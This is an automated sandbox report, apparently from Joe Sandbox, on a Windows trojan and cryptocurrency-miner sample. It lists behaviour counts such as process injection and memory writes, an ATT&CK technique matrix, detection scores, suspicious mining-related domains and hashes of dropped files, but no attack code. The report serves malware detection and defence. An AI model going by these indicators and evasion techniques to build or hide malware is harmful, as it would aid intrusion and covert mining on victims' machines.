Source: | Evasive API call chain: | ||
Source: | Evasive API call chain: |
Source: | API coverage: | ||
Source: | API coverage: |
Source: | Process information queried: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Thread delayed: | ||
Source: | Thread delayed: | ||
Source: | Thread delayed: |
Source: | API call chain: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: |
Source: | Code function: |
Source: | Process token adjusted: | ||
Source: | Process token adjusted: | ||
Source: | Process token adjusted: | ||
Source: | Process token adjusted: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: |
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: |
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: |
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: |
Source: | Code function: |
Source: | Thread register set: | ||
Source: | Thread register set: | ||
Source: | Thread register set: |
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Process created: | ||
Source: | Process created: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Code function: |
Source: | Code function: |
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 1 Command and Scripting Interpreter | 21 Windows Service | 1 Access Token Manipulation | 4 Rootkit | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Credential API Hooking | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | 1 Service Execution | 1 DLL Side-Loading | 21 Windows Service | 11 Masquerading | LSASS Memory | 221 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 1 Native API | Logon Script (Windows) | 712 Process Injection | 1 Disable or Modify Tools | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Access Token Manipulation | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 712 Process Injection | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Hidden Files and Directories | DCSync | 22 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Obfuscated Files or Information | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 1 File Deletion | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
41% | ReversingLabs | Win64.Trojan.Barys | ||
35% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Joe Sandbox ML | |||
44% | ReversingLabs | Win64.Trojan.DisguisedXMRigMiner | ||
64% | Virustotal | Browse | ||
5% | ReversingLabs | |||
2% | Virustotal | Browse | ||
41% | ReversingLabs | Win64.Trojan.Barys |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown |
Joe Sandbox Version: | 37.1.0 Beryl |
Analysis ID: | 884914 |
Start date and time: | 2023-06-09 13:28:13 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 13m 2s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 26 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 25 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample file name: | file.exe |
Detection: | MAL |
Classification: | mal100.troj.evad.mine.winEXE@44/68@0/0 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis
(whitelisted): conhost.exe, Wm iPrvSE.exe, schtasks.exe - Excluded domains from analysis
(whitelisted): gulf.monerooce an.stream, conn.gta5cheatcode. world, pastebin.com, ppanel.fr eaktorrentz.xyz - Execution Graph export aborted
for target file.exe, PID 7028 because it is empty - Execution Graph export aborted
for target powershell.exe, PI D 3804 because it is empty - Not all processes where analyz
ed, report is missing behavior information - Report creation exceeded maxim
um time and may have missing d isassembly code information. - Report size exceeded maximum c
apacity and may have missing b ehavior information. - Report size getting too big, t
oo many NtQueryAttributesFile calls found. - Report size getting too big, t
oo many NtReadVirtualMemory ca lls found. - Report size getting too big, t
oo many NtSetInformationFile c alls found.
Time | Type | Description |
---|---|---|
13:29:08 | API Interceptor | |
13:29:19 | API Interceptor | |
13:29:38 | Task Scheduler | |
13:30:04 | API Interceptor |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 0.34726597513537405 |
Encrypted: | false |
SSDEEP: | 3:Nlll:Nll |
MD5: | 446DD1CF97EABA21CF14D03AEBC79F27 |
SHA1: | 36E4CC7367E0C7B40F4A8ACE272941EA46373799 |
SHA-256: | A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF |
SHA-512: | A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\file.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 5536256 |
Entropy (8bit): | 6.689058470432344 |
Encrypted: | false |
SSDEEP: | 98304:VJuCqT8q5Jt3eM2UIDLeIY3I7LMHrPZF6OhgIDxDjP5ysRAwRCVYFufw6:zulp5JtBF6Oh3DxxysRFkRw6 |
MD5: | 8FA2F1BA9B9A7EA2B3C4DD627C627CEC |
SHA1: | 358E3800286E5D4C5662366AD7311BC5A51BA497 |
SHA-256: | 78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947 |
SHA-512: | 74EDD438B806E086A3FACBE8FB98E235068C0D3F8572C6A3A937649CA0E9A6BCB9F0B42E5562E1CBE3576B011AB83730FC622B1496CC448DD3C296284671E775 |
Malicious: | true |
Yara Hits: |
|
Antivirus: |
|
Preview: |
Process: | C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 14544 |
Entropy (8bit): | 6.2660301556221185 |
Encrypted: | false |
SSDEEP: | 192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ |
MD5: | 0C0195C48B6B8582FA6F6373032118DA |
SHA1: | D25340AE8E92A6D29F599FEF426A2BC1B5217299 |
SHA-256: | 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5 |
SHA-512: | AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D |
Malicious: | true |
Yara Hits: |
|
Antivirus: |
|
Preview: |
Process: | C:\Users\user\Desktop\file.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10264640 |
Entropy (8bit): | 7.644002604978999 |
Encrypted: | false |
SSDEEP: | 98304:AScdwkEObD07UX4SIf6Ky9UBMJs52fvaUhOAllh3uJZbZSvHzmmkvgDlWBixnxCa:Ald3Z0I2T0gAfCbZSvTlRXqbtci+ |
MD5: | EEE7B971E0B76A0DF56BDAC2AC2FA343 |
SHA1: | C80F9D9DE5D0DFF115BBB7638554DADE321D7C65 |
SHA-256: | ECD60313BA990F1300B37DB4064977E83F109FDF93A728CF434106C1B5B5A2D5 |
SHA-512: | FFFD216C820B3BE324AC72A46C50683B42218DEAF95C219670C3F44C091424E8ED5FC42B28F4AAB46E8024A52CBE4CA989031CA3641536F3FAE0A2B5F4F79E85 |
Malicious: | true |
Antivirus: |
|
Preview: |
Process: | C:\Windows\System32\wbem\WMIADAP.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3444 |
Entropy (8bit): | 5.011954215267298 |
Encrypted: | false |
SSDEEP: | 48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW |
MD5: | B133A676D139032A27DE3D9619E70091 |
SHA1: | 1248AA89938A13640252A79113930EDE2F26F1FA |
SHA-256: | AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15 |
SHA-512: | C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\wbem\WMIADAP.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 924 |
Entropy (8bit): | 2.8598329685344623 |
Encrypted: | false |
SSDEEP: | 12:Q1NXCaAGaCGopGGD1JTi0SMfmCwOx6ivG:Q3wU/IM1x6oG |
MD5: | 2667367F9339639AF825E7122CE3B2A3 |
SHA1: | 56E33B464F9AD8D0A6AC3343A85D7618D590FEDC |
SHA-256: | B2353629E198C2F5244BC75AD797789FFBCA2CED084D731084AF312AD6DCBE7F |
SHA-512: | A214C16977CFD760929F76D33DBA89277C6BC7B5948ACFBD89D6AF4A688B9F421D3D2860E1CAE81436E05A52FFED92B04AA2ABBF70CE7231A053BD3E724F3EA9 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 4.2640752180121995 |
Encrypted: | false |
SSDEEP: | 384:AhO7X/cfpYaTjLjVnrRcF36QoXmH4yH631Sy7omGd4e4BZiLqwV:Aw7X/cfJf4F36QoXmYyHgScomGd4e0i |
MD5: | 3DE60C311BA5F4294721C9FBF4A37053 |
SHA1: | A299F68A8A79845B296142D2E556930913AFE3D5 |
SHA-256: | D00B8F740A149BC47FFEE0E071EA21376257208357AFB8CD57C3E3CC39421A5A |
SHA-512: | ACA307930C90095207342AC8866416E8517F593640ECD140679761A9111223299E5C8C126FB8DF84F4A02DD02A829E24EA7AB6FBCFF9D947D75B125C915C5A59 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 4.347250455983504 |
Encrypted: | false |
SSDEEP: | 768:TDw9YZvRDamznmD7zMUkgzBu5ndlhoT/qBs8jegk8FW:3WYZJDamzUVkgz |
MD5: | FF0FD6409A56C7FE0AA6D1E4B003B279 |
SHA1: | 250FCA49B543051D7ACBE9B3A22D20B3F7336CC7 |
SHA-256: | 75DB5782AC99B761C766463592578BB6453181DC04BD93CD5A805BACA158F301 |
SHA-512: | C3CF53C18D7BDF72E8C7CC2D8F0F8ADB40C2AB75DB332F66BB7138C4B41D8B454601B44DD38140A8E14CB08B26F14289B976FBAD18695C392C251F8C493E3435 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 4.411787532800935 |
Encrypted: | false |
SSDEEP: | 384:OhpVnVlVKViV7V5VCVB1VKV/VAVTV5VhVeVUVGV3MVVXVqmVXVGVaVWVI1kVKVzM:O0KCE9WqcKM0 |
MD5: | 4FC975079020351D7E7F5EEA828EC85E |
SHA1: | 5F47AEB875F63054A9D90F18158E1CD297E45A4D |
SHA-256: | 14DD828B2AB6F3B9E521DACF6AFBA47231734B2CD31CCB9C79B90C4697BD0A13 |
SHA-512: | 9FEEC7B4FA450EF7B4DA827A93728A4D413B30E9A70500E52C16FC5BDFE6F6C2DD6699CF16357741B984BE20AA39B6C9CDFE1D2B671DCA6FE84DB73F824D239F |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 4.358272552481095 |
Encrypted: | false |
SSDEEP: | 768:0jOA+MT8lqm6jLtIhMEp8eitIa+wff9Fi:/A+Mglqm6jLtIhMEp8eitIa+wff9Fi |
MD5: | 6C371EF480A05D7DA2A4BFF27D3D7C0C |
SHA1: | 2356A48C55143619D84F7F26B146829DFA3A5287 |
SHA-256: | 4CCF963F56389BC0475E9719D4B17815189B4E4DC81C6025A7EB3DE2992902A8 |
SHA-512: | 5518C7A29965FDA98592372B23B4B99D23F3FCBC5A961532900C42D4DB851C798E29BF48A9B911D54F7C9C8261AF2D1236C5CE690F3B4FB785EB3F6382B92891 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.34944440006736494 |
Encrypted: | false |
SSDEEP: | 96:7PNVaO8oM33Z85ZMLS3Z85ZEb73Z85Zu:hV78p8nMLSp8n67p8n |
MD5: | 8060447F44E276F35409FD79D5942504 |
SHA1: | 6110FF4F6EFCE1D49465037721FC4C43F53900CE |
SHA-256: | 070B65D8FFBBA52124D5B713E259CA2A4900B9741B9601E979C8666510E58D79 |
SHA-512: | 8F74FEEB8B25965F88D7FCDAD8BFB63F72D34EF388296F10543F43298D6E8A07618F451A682BC96FA69F4CD79A3B9B79E81A08687F6714155AE84096404A5BF9 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66432 |
Entropy (8bit): | 2.861101034163211 |
Encrypted: | false |
SSDEEP: | 384:+pYhCp+VpblpbmpbQpbUpbPpS0pQZp68jp6LpM3pMlypb8pbrpb/pb2pS3pQ+p6b:75xhDNeIY |
MD5: | 8755196181DBFBA9189EE0F48EC6301C |
SHA1: | ABE2E878D0C676B032DBFE68FA787BCD7B30A90C |
SHA-256: | B1A0F3119A6BB7D217D8D10737EEE39D8B1448B53F2DC2A603CFACFA18324838 |
SHA-512: | E6988EEB611873E7E98A813050F46E8C3B012A7948814F01CE6DB525F55F01D79517686B8269658568219DFEEF690CF4CD8173B252A5D33E6ECA3E76610ED611 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 3.6173737032728863 |
Encrypted: | false |
SSDEEP: | 384:yhnGwG+T7Gx4GyoGhGNGMGNsGX/GlGYMGbYGqGjGEGZGgGAGZG7GMGBGaGjGBGlT:ymw+ZGLBYKzK01OS |
MD5: | 00151E8AE08696975F05A052F35BD9B3 |
SHA1: | 5C22458E5968CA480B77FFE4ABD008FF6EE9775C |
SHA-256: | CC8DA9420C79DB1B03AD1C25525B753A973BBDDD6C922ABA86518C6CABF12DE1 |
SHA-512: | 126938ACBBD712C5AB13F6CB97059F263F012359AF138AA8A479BE963C86D7198606B8FBDC12C14FE4BF96FBF9C7553CDA42E3AC85A8EFBC1405E8E9B08ACEF1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.9829684085040848 |
Encrypted: | false |
SSDEEP: | 384:Jhgo69uLpogoriorhorkkorhor3uaor5orhorIor6orlg9orUoryorEorGoreorR:JuuLrue |
MD5: | A581AE4D2F6CE3E24531C3909FBAF235 |
SHA1: | 08706919EDAECD9DAA7E9F4E91FE4DB59241E6B3 |
SHA-256: | BAF2FDDB20874C5FC87CA422C7D9052445BD26EBD193FF31F0197F0EECB07FAE |
SHA-512: | 51E4D1138AC810E3EF8458DD54119B7DDCCECBDA94189560C289E3294670E9ED458BAF6DD1EA8DCAA54318B847E6B1846B49703337E7435A037FC5CC7C954F6F |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.8424940844900799 |
Encrypted: | false |
